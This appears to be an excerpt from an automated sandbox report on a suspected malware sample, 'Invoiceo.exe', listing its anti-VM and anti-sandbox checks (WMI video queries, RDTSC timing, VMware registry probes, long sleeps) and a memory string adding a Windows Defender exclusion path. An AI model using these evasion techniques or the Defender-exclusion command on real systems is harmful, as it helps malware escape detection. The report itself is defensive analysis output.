Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Invoiceo.exe PID: 6316, type: MEMORY
Source: Yara match	File source: 0.2.Invoiceo.exe.276f578.1.raw.unpack, type: UNPACKEDPE

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Invoiceo.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Invoiceo.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 00000000032098E4 second address: 00000000032098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmd.exe	RDTSC instruction interceptor: First address: 0000000003209B4E second address: 0000000003209B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Invoiceo.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\Invoiceo.exe

Code function: 11_2_00409A80 rdtsc

11_2_00409A80

Source: C:\Users\user\Desktop\Invoiceo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5553	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1674	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4919	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1675	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5079
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1619

Source: C:\Users\user\Desktop\Invoiceo.exe TID: 6320	Thread sleep time: -103696s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe TID: 6392	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6360	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6832	Thread sleep count: 4919 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6848	Thread sleep count: 1675 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7024	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5964	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep count: 5079 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988	Thread sleep count: 1619 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7076	Thread sleep count: 57 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1784	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\explorer.exe TID: 2996	Thread sleep time: -34000s >= -30000s
Source: C:\Windows\SysWOW64\cmd.exe TID: 1020	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0034245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,	26_2_0034245C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003468BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,	26_2_003468BA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_0033B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,	26_2_0033B89C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003385EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	26_2_003385EA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 26_2_003531DC FindFirstFileW,FindNextFileW,FindClose,	26_2_003531DC

Source: C:\Users\user\Desktop\Invoiceo.exe	Thread delayed: delay time: 103696	Jump to behavior
Source: C:\Users\user\Desktop\Invoiceo.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: Invoiceo.exe, 00000000.00000003.215268410.0000000000A11000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: powershell.exe, 00000004.00000003.393456131.0000000004DC0000.00000004.00000001.sdmp, powershell.exe, 00000006.00000003.394881873.0000000004F3D000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 0000000D.00000000.275306032.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000D.00000000.221314636.0000000001398000.00000004.00000020.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000D.00000000.268751603.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Invoiceo.exe, 00000000.00000003.215268410.0000000000A11000.00000004.00000001.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMware8_O3CNNUWin32_VideoController1Z5FG1T2VideoController120060621000000.000000-0000.456736display.infMSBDAB587FGP2PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsG4NTR4RC
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 0000000D.00000000.275306032.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000D.00000000.250372199.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000D.00000000.268751603.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000D.00000002.500423211.00000000056E5000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWal<%SystemRoot%\system32\mswsock.dllkagesB
Source: explorer.exe, 0000000D.00000000.275306032.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 0000000D.00000000.271240625.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Invoiceo.exe, 00000000.00000002.217060931.0000000002741000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000D.00000000.250274438.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
